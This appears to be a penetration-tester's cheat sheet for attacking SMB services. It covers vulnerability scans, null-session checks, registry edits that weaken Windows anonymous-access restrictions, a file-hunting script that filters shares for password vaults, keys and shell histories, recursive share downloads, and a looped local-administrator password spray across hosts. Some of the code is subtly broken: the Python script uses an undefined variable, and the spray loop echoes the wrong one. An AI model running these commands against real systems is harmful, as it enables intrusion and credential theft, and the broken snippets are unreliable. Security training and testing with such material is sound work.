TwitterGitHubBlog

SMB

Server Message Block

Check for SMB vulnerablities with Nmap:

$ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445
$ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445

Check if SMB Signing is enabled with CME:

$ cme smb smb.txt | grep -a 'signing:False'

Fingerprint

Enumerate SMB version for old versions of Samba (for security reasons modern clients will not initiate connection with legacy protocols in use):

$ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
$ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1'

Mounting

Mount:

$ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!']

Status:

$ mount -v | grep 'type cifs'
$ df -k -F cifs

Unmount:

$ sudo umount /mnt/smb

SMB Share with Null Authentication

Create an SMB share allowing null authentication.

Linux

/etc/samba/smb.conf
[global]
   map to guest = bad user
   server role = standalone server
   usershare allow guests = yes
   smb ports = 445

[smb]
   comment = Samba
   path = /srv/smb
   guest ok = yes
   read only = no
   browsable = yes
   force user = nobody
$ sudo service smbd restart
$ sudo chown -R nobody:root /srv/smb/
$ sudo chmod -R 777 /srv/smb/

Windows

PS > mkdir C:\share
PS > icacls C:\share\ /T /grant Anonymous` logon:r
PS > icacls C:\share\ /T /grant Everyone:r
PS > New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f  # this will overwrite existing NullSessionPipes
PS > REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
PS > REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

Hunt for Shares & Content

Toy Example

Collect listing of files with size < 10 Mb:

PS > cd \\megacorp.local\share
PS > Get-ChildItem -Recurse -File | ? { $_.Length -lt 10MB } | select -ExpandProperty FullName | Out-File share.txt

Filter only files of interest based on their extensions, print the stats as a Python dict:

$ dos2unix share.txt
$ cat share.txt | grep -e '\.7z$' -e '\.bak$' -e '\.bash_history$' -e '\.bat$' -e '\.bz2$' -e '\.cfg$' -e '\.cmd$' -e '\.conf$' -e '\.csv$' -e '\.doc$' -e '\.docm$' -e '\.docx$' -e '\.env$' -e '\.gz$' -e '\.ini$' -e '\.json$' -e '\.kdbx$' -e '\.key$' -e '\.odp$' -e '\.ods$' -e '\.odt$' -e '\.old$' -e '\.ovpn$' -e '\.p12$' -e '\.pdf$' -e '\.pem$' -e '\.pfx$' -e '\.ppt$' -e '\.pptx$' -e '\.ps1$' -e '\.rar$' -e '\.rtf$' -e '\.sh$' -e '\.tar$' -e '\.txt$' -e '\.vbs$' -e '\.xls$' -e '\.xlsm$' -e '\.xlsx$' -e '\.xml$' -e '\.yaml$' -e '\.yml$' -e '\.zip$' -e '\.zsh_history$' \
| awk -F. '{print $NF}' \
| sort \
| uniq -c \
| awk 'BEGIN { d = "{" } { d = d sprintf("\x27.%s\x27: %s, ", $2, $1) } END { d = substr(d, 1, length(d)-2); print d "}" }'

Generate a list of wanted files (Python) and copy them locally preserving original directory structure (PS):

gen_list.py
#!/usr/bin/env python3
# gen_list.py share.txt > files.txt

import sys
from pathlib import Path
from random import sample

stats = { ... }

with open(sys.argv[1]) as f:
    files = f.read().splitlines()

for suffix, count in stats.items():
    if count <= 1000:
        arr = [line for line in office if Path(line).suffix == suffix]
    else:
        arr = [line for line in office if Path(line).suffix == suffix]
        arr = sample(arr, 1000)
    for a in arr:
        print(a)

Tools

rpcclient

Check for null authentication:

$ rpcclient -N -L 127.0.0.1

With user creds:

$ rpcclient -U 'snovvcrash%Passw0rd!' 127.0.0.1

smbclient(.py)

Check for null authentication:

$ smbclient -N -L 127.0.0.1
$ smbclient -N '\\127.0.0.1\Data'

With user creds:

$ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!'

Get all files recursively:

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Local admin spray:

$ cat use_c.cmd
use c$
ls Windows
$ for srv in `cat 445.tcp`; do proxychains4 -q smbclient.py Administrator:'Passw0rd!'@$srv -inputfile use_c.cmd |& grep Windows && echo $i; done

smbmap

$ smbmap -H 127.0.0.1
$ smbmap -H 127.0.0.1 -u anonymous
$ smbmap -H 127.0.0.1 -u '' -p ''
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName
$ smbmap -H 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -R ShareName -A .

Last updated